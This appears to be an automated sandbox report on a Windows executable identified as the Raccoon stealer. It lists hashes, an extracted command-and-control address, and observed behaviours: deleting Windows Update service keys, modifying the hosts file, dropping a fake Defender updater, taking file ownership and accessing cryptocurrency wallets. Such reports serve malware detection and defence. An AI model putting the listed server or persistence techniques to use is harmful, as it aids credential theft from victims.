Analysis
max time kernel: 126s
max time network: 154s
platform: windows10-2004_x64
resource: win10v2004-20220812-en
resource tags: arch:x64, arch:x86, image:win10v2004-20220812-en, locale:en-us, os:windows10-2004-x64, system
submitted: 08/09/2022, 00:01
Static task
static1
General
Target: d4696b99aae2a8c0b6117c12181ce3b23c2b8b3f0a29d7993a968ec2dcf446f4.exe
Size: 386KB
MD5: 1b318f1b8b06927c70445fb204cde589
SHA1: 424c22ee84b9b94efe8cd9f9d8c15a3cbfb2837b
SHA256: d4696b99aae2a8c0b6117c12181ce3b23c2b8b3f0a29d7993a968ec2dcf446f4
SHA512: 3c1779c3f9fc02fa43e0746b39f44755121a6a58c0cb6b9b2253b22f538aaff144955308c8580956f943ac17d62fbc9744fe730c21320eef142c11890acab2a6
SSDEEP: 12288:p+1TAJgO0d5vgEiySZhb0sJYuVka7CpNIc3r:I1OEifHb08Xk
Malware Config
Extracted
raccoon
654b3e7f2d409dcde795b5d2dacf4955
http://46.249.58.152/
Signatures

Modifies security service 2 TTPs 5 IoCs
description | ioc | Process
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 | reg.exe
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo | reg.exe
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters | reg.exe
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security | reg.exe
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 | reg.exe
Suspicious use of NtCreateProcessExOtherParentProcess 13 IoCs
description | pid | Process | procid_target
PID 4780 created 3276 | 4780 | WerFault.exe | 38
PID 2544 created 4164 | 2544 | WerFault.exe | 33
PID 1684 created 2404 | 1684 | WerFault.exe | 189
PID 4868 created 2500 | 4868 | WerFault.exe | 190
PID 2864 created 832 | 2864 | WerFault.exe | 195
PID 2332 created 408 | 2332 | WerFault.exe | 197
PID 4740 created 1732 | 4740 | WerFault.exe | 201
PID 1716 created 4620 | 1716 | WerFault.exe | 207
PID 1228 created 4744 | 1228 | DllHost.exe | 213
PID 4192 created 4236 | 4192 | WerFault.exe | 216
PID 3280 created 1948 | 3280 | WerFault.exe | 219
PID 4556 created 3084 | 4556 | WerFault.exe | 222
PID 944 created 1240 | 944 | WerFault.exe | 225
Suspicious use of NtCreateUserProcessOtherParentProcess 17 IoCs
description | pid | Process | procid_target
PID 3516 created 580 | 3516 | powershell.EXE | 3
PID 4540 created 3276 | 4540 | svchost.exe | 38
PID 4540 created 4164 | 4540 | svchost.exe | 33
PID 1140 created 580 | 1140 | powershell.EXE | 3
PID 4540 created 2404 | 4540 | svchost.exe | 189
PID 4540 created 2500 | 4540 | svchost.exe | 190
PID 4540 created 832 | 4540 | svchost.exe | 195
PID 4540 created 408 | 4540 | svchost.exe | 197
PID 4540 created 1732 | 4540 | svchost.exe | 201
PID 4540 created 2400 | 4540 | svchost.exe | 202
PID 4540 created 4336 | 4540 | svchost.exe | 208
PID 4540 created 4620 | 4540 | svchost.exe | 207
PID 4540 created 4744 | 4540 | svchost.exe | 213
PID 4540 created 4236 | 4540 | svchost.exe | 216
PID 4540 created 1948 | 4540 | svchost.exe | 219
PID 4540 created 3084 | 4540 | svchost.exe | 222
PID 4540 created 1240 | 4540 | svchost.exe | 225
Downloads MZ/PE file

Drops file in Drivers directory 2 IoCs
description | ioc | Process
File opened for modification | C:\Windows\system32\drivers\etc\hosts | conhost.exe
File opened for modification | C:\Windows\system32\drivers\etc\hosts | conhost.exe
Executes dropped EXE 4 IoCs
pid | Process
4352 | Zd60uZ7J.exe
2252 | conhost.exe
2444 | update.exe
1496 | dialer.exe

Possible privilege escalation attempt 4 IoCs
pid | Process
3484 | takeown.exe
4964 | icacls.exe
4764 | takeown.exe
4996 | icacls.exe
Stops running service(s) 3 TTPs

Loads dropped DLL 3 IoCs
pid | Process
2448 | AppLaunch.exe
2448 | AppLaunch.exe
2448 | AppLaunch.exe

Modifies file permissions 1 TTPs 4 IoCs
pid | Process
3484 | takeown.exe
4964 | icacls.exe
4764 | takeown.exe
4996 | icacls.exe
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs

Drops file in System32 directory 13 IoCs
description | ioc | Process
File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.EXE.log | powershell.EXE
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.exe
File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx | svchost.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 | svchost.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 | svchost.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 | svchost.exe
File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.EXE
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Roaming\42B1.tmp | conhost.exe
File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log | conhost.exe
File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.EXE
File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log | powershell.EXE
File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx | svchost.exe
Suspicious use of SetThreadContext 5 IoCs
description | pid | Process | procid_target
PID 4944 set thread context of 2448 | 4944 | d4696b99aae2a8c0b6117c12181ce3b23c2b8b3f0a29d7993a968ec2dcf446f4.exe | 83
PID 2424 set thread context of 2252 | 2424 | conhost.exe | 118
PID 3516 set thread context of 4060 | 3516 | powershell.EXE | 137
PID 1140 set thread context of 4264 | 1140 | powershell.EXE | 149
PID 908 set thread context of 1496 | 908 | conhost.exe | 184

Drops file in Program Files directory 3 IoCs
description | ioc | Process
File opened for modification | C:\Program Files\Platform\Defender\update.exe | conhost.exe
File created | C:\Program Files\Google\Libs\WR64.sys | conhost.exe
File created | C:\Program Files\Platform\Defender\update.exe | conhost.exe

Drops file in Windows directory 4 IoCs
description | ioc | Process
File opened for modification | C:\Windows\Tasks\dialersvc32.job | conhost.exe
File created | C:\Windows\Tasks\dialersvc64.job | conhost.exe
File opened for modification | C:\Windows\Tasks\dialersvc64.job | conhost.exe
File created | C:\Windows\Tasks\dialersvc32.job | conhost.exe
Launches sc.exe 10 IoCs
Sc.exe is a Windows utility to control services on the system.
pid | Process
1904 | sc.exe
3632 | sc.exe
736 | sc.exe
4544 | sc.exe
4668 | sc.exe
2656 | sc.exe
4184 | sc.exe
4584 | sc.exe
4516 | sc.exe
4904 | sc.exe
Program crash 32 IoCs
pid | pid_target | Process | procid_target
2160 | 3276 | WerFault.exe | 38
4668 | 4164 | WerFault.exe | 33
3720 | 2404 | WerFault.exe | 189
4668 | 2500 | WerFault.exe | 190
3012 | 832 | WerFault.exe | 195
1680 | 408 | WerFault.exe | 197
3448 | 1732 | WerFault.exe | 201
3456 | 2400 | WerFault.exe | 202
940 | 4336 | WerFault.exe | 208
4256 | 4620 | WerFault.exe | 207
1952 | 4744 | WerFault.exe | 213
1892 | 4236 | WerFault.exe | 216
4544 | 1948 | WerFault.exe | 219
1140 | 3084 | WerFault.exe | 222
3712 | 1240 | WerFault.exe | 225
1940 | 3684 | WerFault.exe | 228
1864 | 1036 | WerFault.exe | 231
2916 | 3148 | WerFault.exe | 234
3632 | 2424 | WerFault.exe | 237
3692 | 4476 | WerFault.exe | 240
5004 | 1228 | WerFault.exe | 243
4644 | 3132 | WerFault.exe | 246
4544 | 224 | WerFault.exe | 249
2732 | 4240 | WerFault.exe | 252
4324 | 4860 | WerFault.exe | 255
3100 | 1644 | WerFault.exe | 258
2432 | 3448 | WerFault.exe | 261
1732 | 3120 | WerFault.exe | 264
1436 | 3772 | WerFault.exe | 267
3424 | 3860 | WerFault.exe | 270
2928 | 4688 | WerFault.exe | 273
3720 | 4940 | WerFault.exe | 276
Checks processor information in registry 2 TTPs 45 IoCs
Processor information is often read in order to detect sandboxing environments.
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WerFault.exe
Enumerates system info in registry 2 TTPs 30 IoCs
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Modifies data under HKEY_USERS 64 IoCs
description | ioc | Process
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | powershell.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | powershell.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | conhost.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | powershell.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | powershell.EXE
Modifies registry key 1 TTPs 18 IoCs
pid | Process
2032 | reg.exe
4620 | reg.exe
2500 | reg.exe
4572 | reg.exe
2640 | reg.exe
3992 | reg.exe
1384 | reg.exe
3712 | reg.exe
2732 | reg.exe
3100 | reg.exe
1136 | reg.exe
1064 | reg.exe
5088 | reg.exe
2260 | reg.exe
3888 | reg.exe
2452 | reg.exe
4152 | reg.exe
3388 | reg.exe
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid | Process
612 | powershell.exe
612 | powershell.exe
3864 | powershell.exe
3864 | powershell.exe
2424 | conhost.exe
3516 | powershell.EXE
3516 | powershell.EXE
3516 | powershell.EXE
4060 | dllhost.exe
4060 | dllhost.exe
4060 | dllhost.exe
4060 | dllhost.exe
1140 | powershell.EXE
4060 | dllhost.exe
4060 | dllhost.exe
4060 | dllhost.exe
4060 | dllhost.exe
4060 | dllhost.exe
4060 | dllhost.exe
4060 | dllhost.exe
4060 | dllhost.exe
4060 | dllhost.exe
4060 | dllhost.exe
4060 | dllhost.exe
4060 | dllhost.exe
4060 | dllhost.exe
4060 | dllhost.exe
4060 | dllhost.exe
4060 | dllhost.exe
4060 | dllhost.exe
4060 | dllhost.exe
4060 | dllhost.exe
4060 | dllhost.exe
4060 | dllhost.exe
4060 | dllhost.exe
4060 | dllhost.exe
4060 | dllhost.exe
2160 | WerFault.exe
2160 | WerFault.exe
4060 | dllhost.exe
4060 | dllhost.exe
4668 | WerFault.exe
4668 | WerFault.exe
4060 | dllhost.exe
4060 | dllhost.exe
1140 | powershell.EXE
4060 | dllhost.exe
4060 | dllhost.exe
4060 | dllhost.exe
4060 | dllhost.exe
4060 | dllhost.exe
4060 | dllhost.exe
4060 | dllhost.exe
4060 | dllhost.exe
4540 | svchost.exe
4540 | svchost.exe
4540 | svchost.exe
4540 | svchost.exe
4060 | dllhost.exe
4060 | dllhost.exe
4060 | dllhost.exe
4060 | dllhost.exe
4060 | dllhost.exe
4060 | dllhost.exe

Suspicious behavior: LoadsDriver 1 IoCs
pid | Process
652 | Process not Found
Suspicious use of AdjustPrivilegeToken 64 IoCs
description | pid | Process
Token: SeDebugPrivilege | 612 | powershell.exe
Token: SeShutdownPrivilege | 1256 | powercfg.exe
Token: SeCreatePagefilePrivilege | 1256 | powercfg.exe
Token: SeShutdownPrivilege | 2192 | powercfg.exe
Token: SeCreatePagefilePrivilege | 2192 | powercfg.exe
Token: SeDebugPrivilege | 3864 | powershell.exe
Token: SeShutdownPrivilege | 3676 | powercfg.exe
Token: SeCreatePagefilePrivilege | 3676 | powercfg.exe
Token: SeShutdownPrivilege | 1068 | powercfg.exe
Token: SeCreatePagefilePrivilege | 1068 | powercfg.exe
Token: SeTakeOwnershipPrivilege | 3484 | takeown.exe
Token: SeIncreaseQuotaPrivilege | 3864 | powershell.exe
Token: SeSecurityPrivilege | 3864 | powershell.exe
Token: SeTakeOwnershipPrivilege | 3864 | powershell.exe
Token: SeLoadDriverPrivilege | 3864 | powershell.exe
Token: SeSystemProfilePrivilege | 3864 | powershell.exe
Token: SeSystemtimePrivilege | 3864 | powershell.exe
Token: SeProfSingleProcessPrivilege | 3864 | powershell.exe
Token: SeIncBasePriorityPrivilege | 3864 | powershell.exe
Token: SeCreatePagefilePrivilege | 3864 | powershell.exe
Token: SeBackupPrivilege | 3864 | powershell.exe
Token: SeRestorePrivilege | 3864 | powershell.exe
Token: SeShutdownPrivilege | 3864 | powershell.exe
Token: SeDebugPrivilege | 3864 | powershell.exe
Token: SeSystemEnvironmentPrivilege | 3864 | powershell.exe
Token: SeRemoteShutdownPrivilege | 3864 | powershell.exe
Token: SeUndockPrivilege | 3864 | powershell.exe
Token: SeManageVolumePrivilege | 3864 | powershell.exe
Token: 33 | 3864 | powershell.exe
Token: 34 | 3864 | powershell.exe
Token: 35 | 3864 | powershell.exe
Token: 36 | 3864 | powershell.exe
Token: SeIncreaseQuotaPrivilege | 3864 | powershell.exe
Token: SeSecurityPrivilege | 3864 | powershell.exe
Token: SeTakeOwnershipPrivilege | 3864 | powershell.exe
Token: SeLoadDriverPrivilege | 3864 | powershell.exe
Token: SeSystemProfilePrivilege | 3864 | powershell.exe
Token: SeSystemtimePrivilege | 3864 | powershell.exe
Token: SeProfSingleProcessPrivilege | 3864 | powershell.exe
Token: SeIncBasePriorityPrivilege | 3864 | powershell.exe
Token: SeCreatePagefilePrivilege | 3864 | powershell.exe
Token: SeBackupPrivilege | 3864 | powershell.exe
Token: SeRestorePrivilege | 3864 | powershell.exe
Token: SeShutdownPrivilege | 3864 | powershell.exe
Token: SeDebugPrivilege | 3864 | powershell.exe
Token: SeSystemEnvironmentPrivilege | 3864 | powershell.exe
Token: SeRemoteShutdownPrivilege | 3864 | powershell.exe
Token: SeUndockPrivilege | 3864 | powershell.exe
Token: SeManageVolumePrivilege | 3864 | powershell.exe
Token: 33 | 3864 | powershell.exe
Token: 34 | 3864 | powershell.exe
Token: 35 | 3864 | powershell.exe
Token: 36 | 3864 | powershell.exe
